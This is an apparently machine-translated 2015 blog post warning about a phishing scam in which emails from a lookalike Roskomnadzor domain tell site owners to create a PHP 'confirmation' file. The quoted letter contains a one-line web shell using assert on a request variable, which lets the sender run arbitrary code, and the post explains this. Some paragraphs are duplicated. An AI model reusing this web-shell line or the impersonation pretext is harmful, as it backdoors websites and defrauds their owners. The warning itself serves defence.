August 27, 2015 at 01:21Unusual divorce under the guise of Roskomnadzor
A post-caution, since the divorce is very unusual and created on the wave of blockages by Roskomnadzor.
I think that many have heard that Roskomnadzor has recently recruited many employees who search the Internet for prohibited information and block pages on the Internet. In parallel with this, Roskomnadzor forms a “register of information dissemination organizers” (the law on bloggers). Habr was added to this list on September 25, 2014.
In any case, Roskomnadzor has earned a not very good reputation and is confident that site owners are afraid to get on any list of this organization.
Today, a good friend of mine sent me a letter in which it was written that her site with relatively little traffic was entered into this registry.
The text of the letter below, spelling and punctuation saved.
I am sure that it became clear to many that this was a divorce, but the scammers did everything so that not very advanced users performed the instructions: the letter came from zapret-info@roskomnadzor.org, so an illiterate user might think that they really wrote to him from this organization. When switching to the address roskomnadzor.org, the user switches to rkn.gov.ru, which creates the illusion of a real site and domain. The domain roskomnadzor.org was registered 6 days ago.
Many actions from the user are not needed: create a directory, a file, write one line in this file.
The divorce is that the user is prompted to create a file with seemingly harmless php code. However, if you look at the description of the assert function, it will immediately become clear that the attackers will simply execute the code that will be specified in the roskomnadzor variable.
I think that many have heard that Roskomnadzor has recently recruited many employees who search the Internet for prohibited information and block pages on the Internet. In parallel with this, Roskomnadzor forms a “register of information dissemination organizers” (the law on bloggers). Habr was added to this list on September 25, 2014.
In any case, Roskomnadzor has earned a not very good reputation and is confident that site owners are afraid to get on any list of this organization.
Today, a good friend of mine sent me a letter in which it was written that her site with relatively little traffic was entered into this registry.
The text of the letter below, spelling and punctuation saved.
Hello.
You have received this notification from the Federal Service for Supervision of Communications, Information Technologies and Mass Communications (Roskomnadzor) since you are the administrator of the www.yandex.ru domain name on the Internet.
In accordance with the Federal Law of May 5, 2014 No. 97-ФЗ “On Amendments to the Federal Law“ On Information, Information Technologies and the Protection of Information ”and based on a court decision (Novokuybyshevsky City Court of the Samara Region) dated August 11, 2015 No. 21618 / 2015, your site www.yandex.ru has been entered into the register of the organizers of the dissemination of information on the Internet and the sites and / or pages of sites on the Internet that host publicly available information and access to which is more than three during a day thousand network users The Internet".
To identify you as the administrator of the www.yandex.ru domain name , you need to:
1. Create a reestr folder in the root directory of your site
2. Create a reestr-id198617.php file in this folder containing the following text:
<? Php
/ * Confirmation of the domain name www.yandex.ru * /
assert (stripslashes ($ _ REQUEST [roskomnadzor]));
?>
* In <? Php it is necessary to remove the space between <and? Php.
The path to the file on your site should be the following: www.yandex.ru/reestr/reestr-id128032.php
If within 72 hours from the receipt of this letter you do not If you identify yourself as the administrator of the www.yandex.ru domain name , follow the instructions above, then your website www.yandex.ru will be blacklisted by Internet providers and blocked in the Russian Federation.
- Respectfully,
FEDERAL SERVICE FOR SUPERVISION IN THE FIELD OF COMMUNICATION, INFORMATION TECHNOLOGIES AND MASS COMMUNICATIONS.
I am sure that it became clear to many that this was a divorce, but the scammers did everything so that not very advanced users performed the instructions: the letter came from zapret-info@roskomnadzor.org, so an illiterate user might think that they really wrote to him from this organization. When switching to the address roskomnadzor.org, the user switches to rkn.gov.ru, which creates the illusion of a real site and domain. The domain roskomnadzor.org was registered 6 days ago.
Many actions from the user are not needed: create a directory, a file, write one line in this file.
The divorce is that the user is prompted to create a file with seemingly harmless php code. However, if you look at the description of the assert function, it will immediately become clear that the attackers will simply execute the code that will be specified in the roskomnadzor variable.